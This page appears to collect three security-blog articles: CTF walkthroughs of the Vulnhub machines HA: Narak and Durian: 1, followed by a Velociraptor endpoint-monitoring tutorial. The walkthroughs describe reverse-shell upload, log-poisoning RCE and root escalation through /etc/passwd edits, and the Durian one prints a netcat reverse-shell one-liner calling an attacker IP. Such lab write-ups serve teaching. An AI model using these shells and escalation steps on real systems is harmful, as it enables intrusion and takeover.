HA: Narak: Vulnhub Walkthrough

Introduction

Today we are going to crack this vulnerable machine called HA: Narak. This is a Capture the Flag type of challenge.  Overall, it was an Intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

  • Network Scanning
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Directory Bruteforce
  • Exploitation
    • Exploiting PUT Vulnerability using cadaver
  • Post-Exploitation
    • Enumerating SUID permission
    • Decrypting BrainFuck Encryption
    • Reading User Flag
  • Privilege Escalation
    • Logging as Inferno user using SSH
    • Appending the motd file
    • Reconnecting the SSH session
    • Enumerating the permission on nano
    • Adding User with Root Privileges
  • Getting the Root Flag

Walkthrough

Network Scanning

To attack any machine, we need to find the IP Address of the machine. This can be done using the netdiscover command. To find the IP Address, we need to co-relate the MAC Address of the machine that can be obtained from the Virtual Machine Configuration Setting. The IP Address of the machine was found to be 192.168.0.136.

Following the netdiscover scan, we need a Nmap scan to get the information about the services running on the virtual machine. A version Nmap scan reveals that 2 services: SSH (22), HTTP (80) are running on the application.

Enumeration

Since we have the HTTP service running on the virtual machine, let’s take a look at the webpage hosted.

Just a basic webpage with some exciting images of hell. Since there weren’t any new clues, we went back to some more enumeration. Time for some Directory Bruteforce. Just in a few seconds and dirb gives us a /webdav directory. 

We open the WebDAV directory in the web browser to find ourselves an Authentication Panel. Since we don’t have any credentials. We can’t proceed. Bruteforcing without any information is not that useful. We will get back to it in a few moments. 

Now, that we didn’t find any new directories in the normal dirb scan. We tried an extension filter dirb scan. We tried a bunch of other extensions but we got a new result with the .txt extension. We have tips.txt. Let’s take a look at it.

It says that to open the door to Narak can be found in creds.txt. Another text files. Let’s try to find this creds.txt.

Since directory bruteforce any more didn’t give us any more clues regarding the creds.txt. We went back to the port scan. This time we tried a UDP scan. This gave us the port 69. Noice. The service running on TFPT.

We access the TFTP service and see that there is the creds.txt that was mentioned earlier. It contains some encoded text. Looked like Base64. Let’s decode it. After decoding we found that there are some credentials. Nice.

Exploitation

Now, we had the /webdav directory to access this set of credentials. We enumerated and found that WebDAV is used to upload and download files on the apache server. A quick search can tell us that it suffers from PUT Vulnerability. We decided to use this vulnerability and gain a shell on the machine. To do this we used the cadaver tool. After using the credentials, we use put to upload a php reverse shell to the target machine.

Now, that we have uploaded a php shell on the target machine, we created a listener targeting the port that was in the php shell on our local system to capture the session that will get created after we execute it. On the browser, after entering the credentials we can see the uploaded shell.

Post-Exploitation

When we clicked the php shell, our payload gets executed and we have a session on the target machine. We can use the python one-liner to convert the shell into a TTY shell. After getting TTY we work on elevating the privileges on the session that we just generated. We check the SUID permissions and find that there is a custom script named hell.sh. Let’s take a look at the script. There is some encryption inside the script. It seems to be brainfuck encryption.

We decode the encryption and find the word “chitragupt”

Before moving on further, let’s take some time and look for the user flag. As the flag will be in one of the user’s home directory. Time to look for the users in the machine. There are 3 users named inferno, Narak, and yamdoot. Yamdoot seems to be the TFPT user. We were not able to access the Narak directory that means that it is the high privilege user. We enumerate the inferno user and found ourselves the user flag.

Privilege Escalation

Earlier we saw that there are special permissions on the motd file. That means we need to navigate our way to root using the motd privilege escalation. As we found the chitragupt keyword earlier, we used it like a password and logged in to an SSH session as the inferno user.

Now as we know that to escalate privileges from the motd files, we need to add the nano editor into the motd header file. So, we used the echo command to do that as shown in the image below.

As we know that to execute the motd files, we need to exit the current SSH session and connect it again. After doing so we check if the nano binary now has the privileges, we set to it in the previous step. Now we will use this nano to edit the /etc/passwd and create ourselves a user that has the root privileges.

To add a user entry, we will be needing a password hash. This can be generated using the OpenSSL command.

Now, we created a user by the name of Jeenali, gave it root privileges, and added the hash that we generated earlier as shown in the image below.

Now, all that left is to log in as the jeenali aka newly created user, and read the root flag.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on Twitter and LinkedIn

Durian: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “Durian: 1“.  It’s available at VulnHub for penetration testing and you can download it from here.

The merit of making this lab is due to SunCSR Team. Let’s start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

  • Netdiscover
  • Nmap

Enumeration

  • Dirsearch
  • Linpeas.sh

Exploiting

  • LFI + RCE log poisoning

Privilege Escalation

  • Abuse of capabilities gdb
  • Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

So, let’s start by running map to all ports.

Enumeration

We add the IP address to our /etc/hosts to work more comfortably and we list services, directories and files of the three exposed web services. We find interesting and yet vulnerable services like this OpenLiteSpeed Web Server.

This version is vulnerable to null-byte poisoning.

But even if it is too “juicy” it will not serve us, it is a “rabbit hole”.

We continue through the port 80 web service:

We used dirsearch with a medium dictionary and found a couple of directories that look interesting, but we will go to “/cgi-data/“.

We access the directory and find a file that as its name indicates will allow us to load files. But we have to find out which variable the file needs.

There are two options (surely there are more) to find out.

Option 1:

The syntax is commented from the source code.

Option 2:

You will find sometimes with audits or pentest that the code of the application will be totally black box. Wfuzz is usually very good for these cases:

We do a proof of concept as evidence of vulnerability.

Exploiting

This was for me the most complicated part of the box, as it took me more than a day to list the machine’s custom log file.

For the enumeration, I used burp, a custom dictionary of log paths and the word “durian” (machine name).

Request:

Response:

Once found (and excited hehe) we do a proof of concept of RCE (Remote Code Execution)

Request:

Response:

Here I had trouble running a reverse shell directly with “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f“. So I decided to use the “pentestmonkeys” webshell, raise a python server in my kali and download it in the “/var/www/html/blog/” path where I had writing permissions and later we can run it.

Here we see how the server has downloaded it from our python server.

Now we raise a listening netcat and execute the webshell from the url “http://IP/blog/shell.php“. Once inside, we execute as always our two commands to get an interactive revshell.

Privilege Escalation (root)

We check the user’s “durian” folder and execute the command “sudo -l“. We see that we can execute two commands as the root user and without a password. (Now you will see that I did the escalation without either of those two commands)

We run “linpeas.sh” and list that we can abuse the “gdb” binary for its capabilities.

We execute the following syntax that will allow us to scale privileges as the root user and read our proof.txt.

Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.

Threat Hunting: Velociraptor for Endpoint Monitoring (Part 2)

In our previous article, we have covered with Velociraptor master server setup with a brief demonstration of Velociraptor installation, GUI interface set up with some of the forensics Artifacts

If you didn’t read that then don’t worry you can visit that article from here.

Threat Hunting: Velociraptor for Endpoint Monitoring

Once done with a complete server setup we need to focus on “how to Add Hosts or clients of our network environment” for Quick incident Response, forensics, Malware Analysis, and Threat Hunting. In this Blog, we are going to focus our attention only on those machines who shows potential sign of compromises

Now we see how to add a client to the Velociraptor server for further investigations.

Table of Contents

·         Prerequisites

·         Agent or Client Environment

·         Agent installation

§  For Linux Systems

§  For Windows server or windows 10

·         Configure Agent to send Data to Velociraptor Server

·         Forensics investigation / Threat Hunting

 Prerequisites

To configure Velociraptor Agent on your client-server, there are some prerequisites required for installation or pen-testing.

·         Windows, Linux systems, or cloud servers with admin access.

·         Velociraptor Agents

·         Attacker: Kali Linux 

Agent or Client Environment.

In this article, we will target to install Velociraptor Agents on a Windows server and Linux environments. You can download Velociraptor Agents by following the below link.

Choose your installation package 

·         Go to the official GitHub page of Velociraptor by following the above Link

·         Select and install Velociraptor Agents as per your client system

 

Agent installation

 For Linux Systems !! 

To install Velociraptor Agent into your Linux systems, follow the steps as described below: Visit to the official GitHub page of Velociraptor locate and select Velociraptor-Linux-amd64 Package

I prefer to download this package via terminal with wget. To download Agent issue the following command into the terminal.

After downloading it, return to your Velociraptor Master Server and issue the following command to install a client service into the server so that it becomes active to accept connections from the client.

Also, you can verify whether the service is running or not by issuing command services.msc it will open a prompt on your screen as shown below:

Nice! As we can see service is enabled or running.

Next, come to the Directory where the Velociraptor server installed and copy the configuration of the client.config

Configure Agent to send data to Velociraptor server

Return to Linux machine and create a client.config.yaml file and paste the configuration of the client.config file which we have copied above inside a client.config.yaml.

This client configuration file contains a CA certificate that is used for authentication between the client’s machine to the Velociraptor Master server.  After that change permission of the Downloaded Velociraptor Agent to make it executable and then deploy the client to Velociraptor by executing the following command:

Hmm:) !! As you can see service is started sending logs to the Velociraptor server. You can ensure the integration of the client (Ubuntu) machine with the server inside the Velociraptor Master Server which will generate logs for the client connectivity as shown in the image.

Let’s navigate to http://localhost:8889 to access the GUI interface and verify whether the client is reflected on the interface or not by simply running a query in the search bar

where Ubuntu is my client’s system name

Ok 😃 !! you have successfully added the Linux system as a client

For Windows Systems !!

As described above you can download Velociraptor Agent for your windows system by official GitHub page of a velociraptor

In my case, I will target to install Velociraptor agent in Windows server 2016.                                                              

Let’s begin the installation !!

Download package velociraptor-v0.4.9-windows-amd6464.msi, It will download a ZIP file into Your downloads open it install into the system.

Configure Agent to send data to Velociraptor server Open the command prompt with administrator privilege and navigate to velociraptor folder.

So now what we need to do is to generate the configuration. To generate the configuration execute the following command.

Hmm great !! as we can see the agent is installed successfully. Now, since we have this part done

Return to the Velociraptor master server and go to the directory where it is installed and what we need to do is to copy the client.config.yaml file.

Then come back to the windows machine open the directory where Agent is installed and replace the client.config,yaml by simply pasting the file into that directory

Come back to CMD prompt and deploy your client to the Velociraptor server by issuing the following command

Nice 😀  !! You can ensure the integration of the client (Windows) machine with the server inside the Velociraptor Master Server which will generate logs for the client connectivity as shown in the image.

Come back to the Velociraptor server and verify, whether the client is reflected on the GUI interface or not by simply running a query in the search box

where dc:1 is my client’s system name Hmm 😃 !! you have successfully added the Windows system as a client. Now, We have successfully added both Machines that will be monitored by Velociraptor server.

Forensic Investigation / Threat Hunting

Let’s begin some forensics investigation or Threat Hunting

Now if you go back to the homepage you could be able to see your host by searching in the filter box

As we have 2 clients connected to velociraptor

Let’s start an investigation with Machine-1 (Ubuntu) !!

So now we have Hunt Manager you can easily find it on your Dashboard

Hunt manager allows you to hunt for the specific events that happened to your client and also you can view specific artifacts and server events.

we need to create a hunt with specific artifacts to do this move your cursor to the “+” button and select it as shown below.

To create a new hunt in the search window start typing Linux then select the artifacts that you want to hunt and add then select “Next”,

Some prebuilt Artifacts can be used for forensics of Linux systems Available on Velociraptor as listed below

In my case, I’m selecting Linux.Sys.SUID, Linux.Syslog.SSHLogin you can select as much you want.

After selecting next, it will redirect to next prompt where you need to give Hunt Description and then select “Next”

Hunt conditions should be in “operating system” select it in the drop-down menu of Include Condition then select Target OS “Linux” and then hit “Next”

At the next screen, you have your hunt Description or Artifact review, now a select the option “Create Hunt”

Now we have created a new Hunt Named Linux Hunt it reflects on our Hunts panel And We would like to run this hunt by pressing the play button to see what’s next in the result…

Wow 🙄 !! As we can see here is the list of Linux system SUID

Wait this is not enough… Let’s Dig it more Deeper

Let’s take SSH of Linux client from Putty and perform a Brute-force attack from Attacker machine Kali Linux

Exited? let’s do it 😉 !!

open Putty and enter the IP and port no. of the client and open the session

After the opening of the SSH shell login to the Client machine

Nice !! we have successfully logged in to the client machine  Let’s perform a Brute-force attack to check is Velociraptor able to detect the attack or not. Fire up the Attacker machine Kali Linux and run the following command

Let’s check what happened to the GUI interface of Velociraptor.

Hold tight !!

wow !! As we can see it detects and shows 2 successful logins of different machines and 5 failed login attempts just because of Brute force Attack. Let’s check some more artifacts that show the Arp requests and Linux system users.

After creating the Hunt go to the result section and check what happens there…

As we can see it shows All Linux system users with their “UID” and a small description of the role of users.

Let’s check the “ARP” requests on the client

Wow 😱 !! it contains quite enough useful information.

Based on these artifacts you can investigate the scene or your client by creating Hunt as per your requirements also you can create your artifacts if you have good knowledge of VQL.

Let’s investigate our Windows client !! 🙂

Form Dashboard set the host to windows or whatever the client’s computer name.

Then create a Hunt

I’m going to use Artifact “Windows.Sys.FirewallRules

After selecting next it redirects you to next prompt when you need to Hunt Description and then select “Next”

Hunt conditions should be in “operating system” select it in the drop-down menu of Include Condition then select Target OS “Windows” and then hit “Next”

Now we have created a new Hunt Named Windows Hunt it reflects your Hunts panel And We would like to run this hunt by pressing the play button to see what’s next in the result…

Let’s check the result. Hold tight !!

Let’s check the result. Hold tight !!

Nice !! Here is the list of implemented Firewall Rule on the Client’s machine.

 Let’s check out some more artifacts to dig it deeper.

Create a new hunt and add many artifacts as you want. Here I’m going to use “Windows.Collectors.File”

Let’s check what comes in result…..

Wow!! As we can see it listed the All matches Metadata of windows.collectors

Similarly, you can Dig it much Deeper by adding as many artifacts as you need

Hang tight this is not enough!

More will be discussed in part3.

Author – Vijay is a Certified Ethical Hacker, Technical writer and Penetration Tester at Hacking Articles. Technology and Gadget freak. Contact Here